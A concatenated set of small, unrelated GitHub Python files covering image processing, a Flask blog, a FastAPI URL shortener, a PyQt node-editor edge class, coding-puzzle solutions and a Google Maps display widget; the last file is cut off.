Mar 2012\n\n@author: freynaud\n'''\n\nimport time\nimport threading\nfrom threading import Thread\n\n\n\nclass SnapshotListener(threading.Thread):\n '''\n classdocs\n ''' \n \n \n def __init__(self, group=None, target=None, name=None, \n args=(), kwargs=None, verbose=None,callback=None):\n threading.Thread.__init__(self, group=group, target=target, name=name, args=args, kwargs=kwargs, verbose=verbose)\n '''\n Constructor\n '''\n Thread.__init__(self, group, target, name, args, kwargs, verbose)\n self._callback = callback;\n self.last_check = self._get_current_time_in_seconds()\n self._loop_sleep_in_seconds = 1 \n \n \n def run(self):\n while not self._is_time_travel_detected() :\n time.sleep(self._loop_sleep_in_seconds)\n \n print(\"snapshot event\")\n if (self._callback):\n self._callback()\n \n \n \n def _is_time_travel_detected(self):\n previous = self.last_check\n current = self._get_current_time_in_seconds()\n delta = previous - current\n self.last_check = current\n if (abs(delta) > ( self._loop_sleep_in_seconds +1 )):\n print(\"system time travelled \"+str(delta)+\" seconds.\")\n return True\n else :\n return False\n \n def _get_current_time_in_seconds(self):\n now = time.time()\n seconds = int(round(now))\n print(time.strftime(\"%X\",time.gmtime(now)))\n return seconds\n\n","repo_name":"freynaud/commandCenter","sub_path":"SnapshortRevertedListener.py","file_name":"SnapshortRevertedListener.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37797204180","text":"import cv2\nimport numpy as np\n\ndef create_histogram_image(cvimg):\n\n width = 256#cvimg.shape[1]\n h = np.zeros((cvimg.shape[0],width,3),dtype=cvimg.dtype )#np.zeros(cvimg.shape,dtype=cvimg.dtype)\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0),(0,255,0),(0,0,255)]\n\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cvimg], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n h_image=np.flipud(h)\n\n return h_image\n\ndef create_grey_histogram_image(cvimg):\n\n width = 256#cvimg.shape[1]\n h = np.zeros((cvimg.shape[0],width,1),dtype=cvimg.dtype 
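# The SnapshotListener record above detects a snapshot revert by comparing
# consecutive wall-clock reads against the expected sleep interval. The core
# loop reduces to a few lines; a standalone sketch (detect_time_jump is an
# illustrative name, not part of that project):
import time

def detect_time_jump(poll_seconds=1.0, tolerance=1.0):
    # Blocks until the wall clock jumps (forwards or backwards) by more than
    # `tolerance` seconds relative to the expected polling cadence.
    last = time.time()
    while True:
        time.sleep(poll_seconds)
        now = time.time()
        delta, last = now - last, now
        if abs(delta - poll_seconds) > tolerance:
            return delta

# Example (blocks until the system clock actually jumps):
# print('observed jump of', detect_time_jump(), 'seconds')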
)#np.zeros(cvimg.shape,dtype=cvimg.dtype)\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0)]\n\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cvimg], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n h_image=np.flipud(h)\n\n return h_image\n\ndef negate_img(cvimg):\n return 255 - cvimg\n\ndef bitwise_negate_img(cvimg):\n return cv2.bitwise_not(cvimg)\n\ndef convert2grey(cvimg):\n return cv2.cvtColor(cvimg,cv2.COLOR_BGR2GRAY)\n\ndef equalize_hist_img(cvimg):\n return cv2.equalizeHist(convert2grey(cvimg))\n\ndef linear_stretch_hist_img_and_img(cvimg):\n\n g_img = convert2grey(cvimg)\n width = 256\n grey_histo = cv2.calcHist([g_img], [0], None, [width], [0, 256])\n\n histmin = 0\n for i in range(0,255):\n if grey_histo[i] != 0:\n histmin = i\n break\n\n histmax = 255\n for i in range(255,0,-1):\n if grey_histo[i] != 0:\n histmax = i\n break\n\n tmp_grey = (g_img - histmin) * 255.0 / (histmax - histmin)\n cust_grey = np.uint8(np.around(tmp_grey))\n\n bins = np.arange(width).reshape(width,1)\n color = [(255,0,0)]\n h = np.zeros((cust_grey.shape[0], width, 1), dtype=cust_grey.dtype)\n for ch, col in enumerate(color):\n hist_item = cv2.calcHist([cust_grey], [ch], None, [width], [0, 256])\n cv2.normalize(hist_item, hist_item, 0, 255, cv2.NORM_MINMAX)\n hist = np.int32(np.around(hist_item))\n pts = np.column_stack((bins, hist))\n cv2.polylines(h, [pts], False, col)\n\n custom_h_image=np.flipud(h)\n\n return custom_h_image, cust_grey\n\ndef convolve(grey_img,kernel):\n\n (iH, iW) = grey_img.shape[:2]\n (kH, kW) = kernel.shape[:2]\n pad = (kW - 1) // 2\n\n # below can be used if we want to keep padded image\n # image = cv2.copyMakeBorder(cv_img, pad, pad, pad, pad,cv2.BORDER_REPLICATE)\n\n output = np.zeros((iH, iW), dtype='float32')\n\n # inverting colors by scanning through pixels\n for x in xrange(pad, iH - pad):\n for y in xrange(pad, iW - pad):\n roi = grey_img[x - pad:x + pad + 1, y - pad:y + pad + 1]\n k = (roi * kernel).sum()\n output[x, y] = k\n\n #maxout = output.max()\n #minout = output.min()\n #output = (output - minout) * 255.0 / (maxout - minout)\n output = np.uint8(np.around(output))\n\n return output","repo_name":"Zolcseg/medinfo","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6549782119","text":"import cv2\r\nimport numpy as np\r\nimport os \r\nfrom sklearn.decomposition import PCA\r\nfrom feature_extract import My_Hog\r\nimport pandas as pd\r\n\r\nfile = 'E:/openpose/crawler/crop_face/'\r\nsources = ['vcg_CN_1_crop/','veer_CN_1_crop/']\r\nages = ['baby/','child/','early_youth/','youth/','middle_age/','older/']\r\ngenders = ['male/','female/','gender/']\r\ngender_feature=[]\r\nage_feature=[]\r\nfor source in sources:\r\n for age_index,age in enumerate(ages):\r\n for gender_index,gender in enumerate(genders):\r\n filedir=file+source+age+gender\r\n if os.path.exists(filedir):\r\n filepathes = os.listdir(filedir)\r\n\r\n for impath in filepathes:\r\n im=cv2.imread(filedir+impath)\r\n # img_gray = cv2.cvtColor(im, cv2.IMREAD_GRAYSCALE)\r\n Hog_feature = My_Hog(im)\r\n age_feature.append([np.transpose(Hog_feature)[0][:],age_index])\r\n if (age_index >1):\r\n gender_feature.append([np.transpose(Hog_feature)[0][:],gender_index])\r\n 
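# The linear stretch in the utils.py record maps grey level g to
# (g - min) * 255 / (max - min), pinning the darkest pixel to 0 and the
# brightest to 255. The same arithmetic on a toy array, without OpenCV
# (values chosen so the result is easy to verify by hand):
import numpy as np

g = np.array([[50, 100], [150, 200]], dtype=np.uint8)
lo, hi = int(g.min()), int(g.max())  # 50, 200
stretched = np.uint8(np.around((g.astype(np.float64) - lo) * 255.0 / (hi - lo)))
print(stretched)  # [[  0  85]
                  #  [170 255]]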
pd.DataFrame(age_feature).to_csv('HOG_age.txt',header=None,index=None)\r\n pd.DataFrame(gender_feature).to_csv('HOG_gender.txt',header=None,index=None)\r\n#pca = PCA(n_components=2)\r\n#Hog_feature=pca.fit_transform(feature) \r\n# sift = cv2.xfeatures2d.SIFT_create()\r\n# keypoints, descriptor = sift.detectAndCompute(img_gray, None)\r\n# img = cv2.drawKeypoints(image=im, outImage=im, keypoints=keypoints,\r\n# flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS,\r\n# color=(51, 163, 236))\r\n# \r\n# \r\n# winSize = (64,64)\r\n# blockSize = (16,16)\r\n# blockStride = (8,8)\r\n# cellSize = (8,8)\r\n# nbins = 9\r\n# derivAperture = 1\r\n# winSigma = 4.\r\n# histogramNormType = 0\r\n# L2HysThreshold = 2.0000000000000001e-01\r\n# gammaCorrection = 0\r\n# nlevels = 64\r\n# hog = cv2.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,\r\n# histogramNormType,L2HysThreshold,gammaCorrection,nlevels)\r\n# #compute(img[, winStride[, padding[, locations]]]) -> descriptors\r\n# winStride = (8,8)\r\n# padding = (8,8)\r\n# locations = ((10,20),)\r\n# hist = hog.compute(im,winStride,padding,locations)\r\n# print(hist.shape)","repo_name":"xinjialimath/Fudan-course-projects","sub_path":"CVproject_1906/traditional_way_HOG/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74789538962","text":"import lexer\n\nclass Position:\n def __init__(self, idx, line, col) -> None:\n self.idx = idx\n self.line = line\n self.col = col\n\n def advance(self, current):\n self.col += 1\n self.idx += 1\n\n if isinstance(current, str):\n if current == '\\n':\n self.line += 1\n self.col = 0\n elif isinstance(current, lexer.Token):\n if current.type == lexer.T_NL:\n self.line += 1\n self.col = 0\n \n def clone(self):\n return Position(self.idx, self.line, self.col)","repo_name":"dxuglas/L1ProjectLang","sub_path":"src/position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33704619349","text":"import json\n\nimport fastapi\nimport sqlalchemy.exc\n\nimport src.api.redirect_route as redirect_route\nimport src.api.url_router as url_route\nimport src.config\nimport src.db.session\nimport src.logger\n\napp: fastapi.FastAPI = fastapi.FastAPI(\n title=\"URL shortener\", description=\"A simple API for creating short urls\"\n)\napp.include_router(redirect_route.router)\napp.include_router(url_route.router)\nlogger = src.logger.get_logger(__name__)\n\n\n@app.on_event(\"startup\")\nasync def startup() -> None:\n config = src.config.Config()\n src.db.session.configure_session(config.db_url)\n logger.info(json.dumps(\"Application started\"))\n\n\n@app.exception_handler(sqlalchemy.exc.SQLAlchemyError)\ndef handle_sqlalchemy_general_error(\n request: fastapi.Request, exc: sqlalchemy.exc.SQLAlchemyError\n) -> fastapi.responses.JSONResponse:\n return fastapi.responses.JSONResponse(\n status_code=fastapi.status.HTTP_400_BAD_REQUEST,\n content={\"message\": \"Sqlalchemy error\", \"detail\": exc._message()},\n )\n","repo_name":"Nathicanaa/url-shortener","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75061378321","text":"from __future__ import annotations\n\nfrom typing import Optional, OrderedDict\n\nfrom PyQt5.QtCore 
import QPointF, Qt\nfrom PyQt5.QtGui import QColor, QPainter, QPainterPath, QPen\nfrom PyQt5.QtWidgets import (\n QGraphicsPathItem,\n QStyleOptionGraphicsItem,\n QWidget,\n)\n\nfrom pyflow.core.serializable import Serializable\nfrom pyflow.core.socket import Socket\nfrom pyflow.core.executable import Executable, ExecutableState\n\n\nclass Edge(QGraphicsPathItem, Serializable, Executable):\n\n \"\"\"Base class for directed edges in Pyflow.\"\"\"\n\n DEFAULT_DATA = {\"path_type\": \"bezier\"}\n MANDATORY_FIELDS = {\"source\", \"destination\"}\n\n def __init__(\n self,\n edge_width: float = 5.0,\n path_type=DEFAULT_DATA[\"path_type\"],\n edge_color=\"#001000\",\n edge_selected_color=\"#FFA637\",\n edge_running_color=\"#FF0000\",\n edge_pending_color=\"#00ff00\",\n source: QPointF = QPointF(0, 0),\n destination: QPointF = QPointF(0, 0),\n source_socket: Socket = None,\n destination_socket: Socket = None,\n ):\n \"\"\"Base class for edges in Pyflow.\n\n Args:\n edge_width: Width of the edge.\n path_type: Type of path, one of ('direct', 'bezier').\n edge_color: Color of the edge.\n edge_selected_color: Color of the edge when it is selected.\n source: Source point of the directed edge.\n destination: Destination point of the directed edge.\n source_socket: Source socket of the directed edge, overrides source.\n destination_socket: Destination socket of the directed edge, overrides destination.\n\n \"\"\"\n\n Serializable.__init__(self)\n QGraphicsPathItem.__init__(self, parent=None)\n Executable.__init__(self)\n\n self._pen = QPen(QColor(edge_color))\n self._pen.setWidthF(edge_width)\n\n self._pen_dragging = QPen(QColor(edge_color))\n self._pen_dragging.setWidthF(edge_width)\n self._pen_dragging.setStyle(Qt.PenStyle.DashLine)\n\n self._pen_selected = QPen(QColor(edge_selected_color))\n self._pen_selected.setWidthF(edge_width)\n\n self._pen_running = QPen(QColor(edge_running_color))\n self._pen_running.setWidthF(edge_width)\n\n self._pen_pending = QPen(QColor(edge_pending_color))\n self._pen_pending.setWidthF(edge_width)\n\n self.state_pens = {\n ExecutableState.IDLE: self._pen,\n ExecutableState.RUNNING: self._pen_running,\n ExecutableState.PENDING: self._pen_pending,\n }\n\n self.setFlag(QGraphicsPathItem.GraphicsItemFlag.ItemIsSelectable)\n self.setZValue(-1)\n\n self.path_type = path_type\n\n self.source_socket = source_socket\n self.destination_socket = destination_socket\n\n self._source = source\n self._destination = destination\n self.update_path()\n\n def remove_from_socket(self, socket_type=\"source\"):\n \"\"\"Remove the edge from the sockets it is snaped to on the given socket_type.\n\n Args:\n socket_type: One of ('source', 'destination').\n\n \"\"\"\n socket_name = f\"{socket_type}_socket\"\n socket = getattr(self, socket_name, Socket)\n if socket is not None:\n socket.remove_edge(self)\n setattr(self, socket_name, None)\n\n def remove_from_sockets(self):\n \"\"\"Remove the edge from all sockets it is snaped to.\"\"\"\n self.remove_from_socket(\"source\")\n self.remove_from_socket(\"destination\")\n\n def remove(self):\n \"\"\"Remove the edge from the scene in which it is drawn.\"\"\"\n scene = self.scene()\n if scene is not None:\n self.remove_from_sockets()\n scene.removeItem(self)\n\n def paint(\n self,\n painter: QPainter,\n option: QStyleOptionGraphicsItem, # pylint:disable=unused-argument\n widget: Optional[QWidget] = None, # pylint:disable=unused-argument\n ):\n \"\"\"Paint the edge.\"\"\"\n self.update_path()\n if self.isSelected():\n pen = self._pen_selected\n elif 
self.destination_socket is None:\n pen = self._pen_dragging\n else:\n pen = self.state_pens[self.run_state]\n painter.setPen(pen)\n painter.setBrush(Qt.BrushStyle.NoBrush)\n painter.drawPath(self.path())\n\n def update_path(self):\n \"\"\"Update the edge path depending on the path_type.\"\"\"\n path = QPainterPath(self.source)\n if self.path_type == \"direct\":\n path.lineTo(self.destination)\n elif self.path_type == \"bezier\":\n sx, sy = self.source.x(), self.source.y()\n dx, dy = self.destination.x(), self.destination.y()\n mid_dist = (dy - sy) / 2\n path.cubicTo(sx, sy + mid_dist, dx, dy - mid_dist, dx, dy)\n else:\n raise NotImplementedError(f\"Unknowed path type: {self.path_type}\")\n self.setPath(path)\n\n @property\n def source(self) -> QPointF:\n \"\"\"Source point of the directed edge.\"\"\"\n if self.source_socket is not None:\n return self.source_socket.scenePos()\n return self._source\n\n @source.setter\n def source(self, value: QPointF):\n self._source = value\n try:\n self.update_path()\n except AttributeError:\n pass\n\n @property\n def source_socket(self) -> Socket:\n \"\"\"Source socket of the directed edge.\"\"\"\n return self._source_socket\n\n @source_socket.setter\n def source_socket(self, value: Socket):\n self._source_socket = value\n if value is not None:\n self.source_socket.add_edge(self, is_destination=False)\n self.source = value.scenePos()\n\n @property\n def destination(self) -> QPointF:\n \"\"\"Destination point of the directed edge.\"\"\"\n if self.destination_socket is not None:\n return self.destination_socket.scenePos()\n return self._destination\n\n @destination.setter\n def destination(self, value: QPointF):\n self._destination = value\n try:\n self.update_path()\n except AttributeError:\n pass\n\n @property\n def destination_socket(self) -> Socket:\n \"\"\"Destination socket of the directed edge.\"\"\"\n return self._destination_socket\n\n @destination_socket.setter\n def destination_socket(self, value: Socket):\n self._destination_socket = value\n if value is not None:\n self.destination_socket.add_edge(self, is_destination=True)\n self.destination = value.scenePos()\n\n def serialize(self) -> OrderedDict:\n return OrderedDict(\n [\n (\"id\", self.id),\n (\"path_type\", self.path_type),\n (\n \"source\",\n OrderedDict(\n [\n (\n \"block\",\n self.source_socket.block.id\n if self.source_socket\n else None,\n ),\n (\n \"socket\",\n self.source_socket.id if self.source_socket else None,\n ),\n ]\n ),\n ),\n (\n \"destination\",\n OrderedDict(\n [\n (\n \"block\",\n self.destination_socket.block.id\n if self.destination_socket\n else None,\n ),\n (\n \"socket\",\n self.destination_socket.id\n if self.destination_socket\n else None,\n ),\n ]\n ),\n ),\n ]\n )\n\n def deserialize(self, data: OrderedDict, hashmap: dict = None, restore_id=True):\n if restore_id and \"id\" in data:\n self.id = data[\"id\"]\n\n self.complete_with_default(data)\n\n self.path_type = data[\"path_type\"]\n try:\n self.source_socket = hashmap[data[\"source\"][\"socket\"]]\n\n self.destination_socket = hashmap[data[\"destination\"][\"socket\"]]\n self.update_path()\n except KeyError:\n self.remove()\n","repo_name":"Bycelium/PyFlow","sub_path":"pyflow/core/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","stars":1220,"dataset":"github-code","pt":"3"} +{"seq_id":"11804901553","text":"import numpy as np\nimport time\nfrom . 
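# In Edge.update_path above, the 'bezier' branch pulls both cubic control
# points onto the horizontal line halfway between source and destination,
# which is what produces the S-shaped connector. The control-point arithmetic
# can be checked without Qt; cubic_controls is a hypothetical helper written
# for illustration, not part of pyflow:
def cubic_controls(source, destination):
    # Mirrors the 'bezier' branch of Edge.update_path on plain tuples.
    sx, sy = source
    dx, dy = destination
    mid_dist = (dy - sy) / 2
    return (sx, sy + mid_dist), (dx, dy - mid_dist)

c1, c2 = cubic_controls((0.0, 0.0), (100.0, 80.0))
print(c1, c2)  # (0.0, 40.0) (100.0, 40.0)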
import console\n\n# This is currently for use in a 1D model...\nclass Mesh:\n\n def __init__(self, spatial_res, z, verbose=True):\n self.verbose = verbose\n self.spatial_res = spatial_res\n if '.' in str(self.spatial_res):\n self.spatial_sigfigs = len(str(self.spatial_res)) - 1\n else:\n self.spatial_sigfigs = len(str(self.spatial_res))\n self.z = z\n self.z_coords = None\n self.dimensions = 1\n\n\n def build_linear(self, df=None):\n console.event(\"Generating model nodes...\", verbose=self.verbose)\n t_start = time.time()\n nodes = []\n z_coords = np.arange(0.0, self.z + self.spatial_res, self.spatial_res)\n console.event(\"Detected a 1D model. Generating {} nodes...\".format(len(z_coords)), verbose=self.verbose)\n for k in z_coords:\n nodes.append(round(k, self.spatial_sigfigs))\n if df is not None:\n df['coords'] = nodes\n console.event(\"Finished generating model nodes! (task took {}s)\".format(\n time.time() - t_start), verbose=self.verbose)\n return nodes\n\n def get_spatial_sigfigs(self):\n return self.spatial_sigfigs\n\n\n","repo_name":"ScottHull/Chimera","sub_path":"Chimera/Chimera_1D/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70697614163","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nimport psycopg2\nimport highlight\napp = Flask(__name__)\n\n\n@app.route(\"/highlight\")\ndef highlight_route():\n paper_idx = request.args.get('paper', type = str)\n term1 = request.args.get('term1', default = None, type = str)\n term2 = request.args.get('term2', default = None, type = str)\n terms = request.args.get('terms', default = [], type = list)\n if(term1!=None and term2!=None):\n terms = [term1,term2]\n\n dic = highlight.highlight_v2(paper_idx,terms)\n if(type(dic)==str):\n if(dic=='unk'):\n return \"
This paper has an unknown license situation and therefore we cannot show full text of it.
\"\n title=dic['title'] \n absts=dic['abstract']\n bodys=dic['body']\n for abst in absts:\n if(abst['highlight']):\n x = abst['highlight_zone']\n x.sort()\n l = []\n idx = 0\n for (start,end) in x:\n # Go through every highlight zone, splitting the text around it\n l.append((abst['text'][idx:start],False))\n l.append((abst['text'][start:end],True))\n idx = end\n\n l.append((abst['text'][idx:],False))\n abst['text']= l \n #for abst in bodys:\n if(bodys==\"unk\"):\n bodys = [{'text':'This paper has no documented license provided by CORD-19 metadata, and therefore we cannot show the body. Please seek it out from https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge for more information.',\"highlight\":False}]\n \n for i in range(len(bodys)):\n paragraph=bodys[i]\n if(paragraph['highlight']):\n x = paragraph['highlight_zone']\n x.sort()\n l = []\n idx = 0\n for (start,end) in x:\n l.append((paragraph['text'][idx:start],False))\n l.append((paragraph['text'][start:end],True))\n idx = end\n\n l.append((paragraph['text'][idx:],False))\n #abst['text']= l \n paragraph['text'] = l\n bodys[i] = paragraph\n print(paragraph)\n\n\n\n return render_template('highlight.html', title=dic['title'], absts=dic['abstract'],bodys=bodys,journal=dic['journal'], doi=dic['doi'])\n\n","repo_name":"DnlRKorn/CoKE","sub_path":"webportal/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8969079273","text":"#! /usr/bin/env python3.7\n\nfrom typing import List, Optional, Tuple\n\nimport sys\nimport collections\nimport itertools\nimport random\nfrom queue import Queue\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n dx = [1 , 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n seen = set()\n\n for i, row in enumerate(board):\n for j, cell in enumerate(row):\n if cell == \"O\" and (i, j) not in seen:\n seen.add((i, j))\n q = Queue()\n q.put((i, j))\n\n group = [(i,j)]\n\n max_i, min_i = 0, float(\"inf\")\n max_j, min_j = 0, float(\"inf\")\n\n while not q.empty():\n x, y = q.get()\n max_i = max(max_i, x)\n min_i = min(min_i, x)\n max_j = max(max_j, y)\n min_j = min(min_j, y)\n \n for xp, yp in zip(dx, dy):\n xx = max(0, min(x + xp, len(board) - 1))\n yy = max(0, min(y + yp, len(row) - 1))\n if board[xx][yy] == \"O\" and (xx, yy) not in seen:\n seen.add((xx, yy))\n group.append((xx, yy))\n q.put((xx, yy))\n\n if min_i > 0 and max_i < len(board) - 1 and min_j > 0 and max_j < len(row) - 1:\n for x, y in group:\n board[x][y] = \"X\"\n\n def solveFaster(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n dx = [1 , 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n if not board or not board[0]:\n return\n\n rows = len(board)\n cols = len(board[0])\n\n from itertools import product\n borders = list(product(range(0, rows), [0, cols - 1])) + \\\n list(product([0, rows - 1], range(0, cols)))\n\n for i,j in borders:\n if board[i][j] == 'O':\n q = Queue()\n q.put((i, j))\n\n while not q.empty():\n x, y = q.get()\n\n # Only flood cells that are still 'O'; mark them safe ('E').\n if board[x][y] != 'O':\n continue\n\n board[x][y] = 'E'\n\n for xp, yp in zip(dx, dy):\n xx = max(0, min(x + xp, rows - 1))\n yy = max(0, min(y + yp, cols - 1))\n q.put((xx, yy))\n\n for i in range(rows):\n for j in range(cols):\n if board[i][j] != 'X':\n board[i][j] = 'O' if board[i][j] == 'E' else 'X'\n\n\ndef main():\n T = int(input())\n for t in range(T):\n N, M = 
tuple(map(int ,input().split()))\n\n board = [[c for c in str(input())] for _ in range(N)]\n Solution().solveFaster(board)\n\n for row in board:\n for cell in row:\n print(cell, end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MathuxNY-73/leetcode","sub_path":"Graph/surroundedRegions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37838807719","text":"from django.shortcuts import render\nfrom .forms import Wow\n# Create your views here.\n\ndef firstfunc(request):\n \n message = 'Hello fron frist application'\n \n form = Wow()\n \n if request.method == 'POST':\n form = Wow(request.POST)\n \n if form.is_valid():\n \n cd = form.cleaned_data\n message = cd['x']\n \n return render(request, 'myFirstApplication/firstpage.html',\n {'form':form,'message': message})","repo_name":"nasserml/Django-Dr-Kareem","sub_path":"12-TheProjectKingWithForm/myFirstApplication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30869041771","text":"## Framed Reflection\r\n## 6 kyu\r\n## https://www.codewars.com/kata/581331293788bc1702001fa6\r\n\r\n\r\ndef mirror(text):\r\n text = text.split()\r\n length = max(len(x) for x in text)\r\n first, last = ['*' * length + '*' * 4] *2\r\n words = first + '\\n' + '\\n'.join([f'* {word[::-1].ljust(length, \" \")} *' for word in text]) + '\\n' + last\r\n return words","repo_name":"stereoabuse/codewars","sub_path":"problems/framed_reflection.py","file_name":"framed_reflection.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73897772242","text":"#!/usr/bin/env python\n#coding=utf-8\n\nfrom flask import Blueprint, render_template, redirect, url_for, \\\n flash, request, current_app, abort\nfrom myway.utils import db, navbar\nfrom myway.common.login import current_user\n\nfrom .models import Article\nfrom .forms import ArticleForm\n\nmoduleid = 'blog'\nblogview = Blueprint(moduleid, __name__, url_prefix='/' + moduleid)\n\n@blogview.route('/')\n@blogview.route('/page/')\ndef index(page=1):\n perpage = current_app.config['BLOG_PERPAGE']\n key = request.args.get('key', '')\n\n base_query = Article.query\n if current_user.is_anonymous():\n base_query = base_query.filter(db.and_(Article.status==3, Article.visibility < 2))\n base_query = base_query.order_by(Article.create_at.desc())\n\n query = base_query\n if key:\n ikey = '%' + key + '%'\n query = query.filter(db.or_(Article.title.ilike(ikey), Article.md_content.ilike(ikey)))\n\n page_obj = query.paginate(page=page, per_page=perpage)\n page_url = lambda page: url_for('blog.index', page=page)\n recents = base_query.offset(0).limit(perpage)\n kwargs = {\n 'key' : key,\n 'page_obj' : page_obj,\n 'page_url' : page_url,\n 'recents' : recents\n }\n return render_template('blog/index.html', **kwargs)\n\n\n@blogview.route('/')\ndef single(id):\n query = Article.query.filter_by(id=id)\n if current_user.is_anonymous():\n query = query.filter(db.and_(Article.status==3,\n Article.visibility<3))\n article = query.first()\n if not article: abort(404)\n return render_template('blog/single.html', article=article)\n\n\n@blogview.route('/new', methods=['GET', 'POST'])\ndef new():\n form = ArticleForm()\n if form.is_submitted and form.validate_on_submit():\n 
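# solveFaster in the record above works inside-out: rather than testing each
# 'O' region for border contact, it floods from border 'O' cells, marks
# everything reachable as safe, then flips whatever is left. The same
# border-flood idea as a compact standalone function (illustrative, not the
# LeetCode class interface):
from queue import Queue

def capture(board):
    if not board or not board[0]:
        return
    rows, cols = len(board), len(board[0])
    q = Queue()
    for r in range(rows):           # seed with every border 'O'
        for c in range(cols):
            if board[r][c] == "O" and (r in (0, rows - 1) or c in (0, cols - 1)):
                q.put((r, c))
    while not q.empty():            # flood: border-connected cells become 'E'
        r, c = q.get()
        if 0 <= r < rows and 0 <= c < cols and board[r][c] == "O":
            board[r][c] = "E"
            for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
                q.put((r + dr, c + dc))
    for r in range(rows):           # interior regions flip; safe cells revert
        for c in range(cols):
            board[r][c] = "O" if board[r][c] == "E" else "X"

grid = [list("XXXX"), list("XOOX"), list("XXOX"), list("XOXX")]
capture(grid)
print(["".join(row) for row in grid])  # ['XXXX', 'XXXX', 'XXXX', 'XOXX']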
article = Article()\n form.populate_obj(article)\n article.refresh()\n db.session.add(article)\n db.session.commit()\n flash('New article added!', 'success')\n return redirect(url_for('blog.edit', id=article.id))\n\n kwargs = {\n 'form' : form,\n 'action' : url_for('blog.new'),\n 'title' : u'New Article'\n }\n return render_template('blog/new-edit.html', **kwargs)\n\n\n\n@blogview.route('/edit/', methods=['GET', 'POST'])\ndef edit(id):\n form = ArticleForm()\n article = Article.query.get_or_404(id)\n if form.is_submitted and form.validate_on_submit():\n form.populate_obj(article)\n article.refresh()\n db.session.commit()\n flash('Updated!', 'success')\n return redirect(url_for('blog.edit', id=article.id))\n form.process(obj=article)\n\n kwargs = {\n 'form' : form,\n 'action' : url_for('blog.edit', id=id),\n 'view_link' : url_for('blog.single', id=id),\n 'title' : u'Edit: %s' % article.title\n }\n return render_template('blog/new-edit.html', **kwargs)\n\n\n\n\n@blogview.route('/delete/', methods=['GET', 'POST'])\ndef delete(id):\n article = Article.query.get_or_404(id)\n db.session.delete(article)\n db.session.commit()\n flash(u'Article: <%s> Deleted!' % article.title, 'success')\n return redirect('/blog/')\n\n@blogview.context_processor\ndef inject_navid():\n return dict(navid=moduleid)\n\nnavbar.add(moduleid, moduleid.title(), '/%s/' % moduleid)\n","repo_name":"TheWaWaR/myway","sub_path":"myway/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42533809893","text":"import io\nimport math\nimport logging\nimport googlemaps\nfrom babel.dates import format_timedelta\nfrom datetime import datetime, timedelta\nfrom PIL import Image\nfrom epaperengine.widgets.base import BaseWidget\n\nlogger = logging.getLogger(__name__)\n\nHEADER_SIZE = 70\n\n\nclass GooglemapsWidget(BaseWidget):\n fonts = {\n \"route\": (\"OpenSans-Regular-webfont.woff\", 18),\n \"time\": (\"OpenSans-Bold-webfont.woff\", 28),\n }\n\n def __init__(self, settings, size):\n self.key = settings[\"client_key\"]\n self.home = settings[\"home_address\"]\n self.work = settings[\"work_address\"]\n self.units = settings[\"units\"]\n self.locale = settings[\"locale\"]\n self.size = size\n\n # State\n self.client = googlemaps.Client(key=self.key)\n self.map_cache = {}\n self.map = None\n self.directions = None\n\n def _fetch_map(self, directions):\n path = directions[0][\"overview_polyline\"][\"points\"]\n\n if path in self.map_cache:\n return self.map_cache[path]\n\n logger.info(\"Fetching map not in cache\")\n\n width = self.size[0]\n height = self.size[1] - HEADER_SIZE\n\n arguments = 